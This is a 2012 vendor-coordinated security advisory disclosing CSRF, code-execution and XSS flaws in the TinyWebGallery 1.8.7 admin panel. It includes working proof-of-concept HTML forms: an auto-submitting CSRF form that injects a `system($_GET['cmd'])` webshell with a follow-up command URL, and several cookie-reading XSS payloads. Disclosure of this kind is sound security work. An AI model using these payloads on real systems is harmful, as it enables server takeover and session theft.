Multiple vulnerabilities in TinyWebGallery

Advisory ID: HTB23093
Product: TinyWebGallery
Vendor: www.tinywebgallery.com
Vulnerable Version(s): 1.8.7 and probably prior
Tested Version: 1.8.7
Vendor Notification: 23 May 2012
Vendor Patch: 24 May 2012
Public Disclosure: 13 June 2012
Vulnerability Type: Сross-Site Request Forgery (CSRF), Arbitrary Code Execution, Cross-Site Scripting (XSS)
CVE References: CVE-2012-2930, CVE-2012-2931, CVE-2012-2932
CVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Risk Level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ )

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in TinyWebGallery, which can be exploited to perform Сross-Site Request Forgery (CSRF), Arbitrary Code Execution and Cross-Site Scripting (XSS) attacks.

1) Сross-Site Request Forgery (CSRF) in TinyWebGallery: CVE-2012-2930

1.1 The application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to add new users.

An attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability.

2) Arbitrary Code Execution in TinyWebGallery: CVE-2012-2931

2.1 Input passed via the "user" POST parameter to /admin/index.php is not properly sanitised before being written to ".htusers.php" file, however this functionality is available to gallery administrator only. Therefore a malicious user may add arbitrary PHP code to this file using CSRF attack vector.

The following CSRF PoC (Proof of Concept) will insert a very simple webshell to the ".htusers.php":

<form action="http://[host]/admin/index.php?action=admin&dir=&order=name&srt=yes&tview=no&sview=yes&lang=en&action2=adduser" method="post" name="main" id="main">
<input type="hidden" name="confirm" value="true">
<input type="hidden" name="pass1" value="">
<input type="hidden" name="pass2" value="">
<input type="hidden" name="home_dir" value=".">
<input type="hidden" name="show_hidden" value="0">
<input type="hidden" name="no_access" value="^\.ht">
<input type="hidden" name="permissions" value="8">
<input type="hidden" name="upload_settings" value="15">
<input type="hidden" name="active" value="1">
<input type="hidden" name="user" value='")); system($_GET["cmd"]); $a=array(array("'>
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>

After a logged-in administrator will visit malicious page with the above-mentioned PoC, a webshell will be available here:

http://[host]/admin/index.php?cmd=ls -la;id;pwd;uname -a;

3) Multiple XSS in TinyWebGallery: CVE-2012-2932

3.1 Input passed via the "selitems[]" POST parameter to /admin/index.php (when "action" GET parameter is set to "copy", "chmod" or "arch") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/admin/index.php?action=copy" method="post" name="main" id="main">
<input type="hidden" name="selitems[]" value='"><script>alert(document.cookie);</script>'>
<input type="submit" value="submit" id="btn">
</form>

<form action="http://[host]/admin/index.php?action=chmod" method="post" name="main" id="main">
<input type="hidden" name="selitems[]" value='<script>alert(document.cookie);</script>'>
<input type="submit" value="submit" id="btn">
</form>

<form action="http://[host]/admin/index.php?action=arch" method="post" name="main" id="main">
<input type="hidden" name="selitems[]" value='"><script>alert(document.cookie);</script>'>
<input type="submit" value="submit" id="btn">
</form>

3.2 Input passed via the "searchitem" POST parameter to /admin/index.php (when "action" GET parameter is set to "search") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/admin/index.php?action=search" method="post" name="main" id="main">
<input type="hidden" name="searchitem" value='<script>alert(document.cookie);</script>'>
<input type="submit" value="submit" id="btn">
</form>

Solution:

Upgrade to latest TWG 1.8.8 build.

More Information:
http://www.tinywebgallery.com/forum/viewtopic.php?f=14&amp;t=3274

References:

[1] High-Tech Bridge Advisory HTB23093 - https://www.htbridge.com/advisory/HTB23093 - Multiple vulnerabilities in TinyWebGallery.
[2] TinyWebGallery - http://www.tinywebgallery.com - The TinyWebGallery is a free php photo album / gallery that is very easy to install, extremely user friendly, does not need a database (uses xml files) but still has all the features you should expect and much more.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.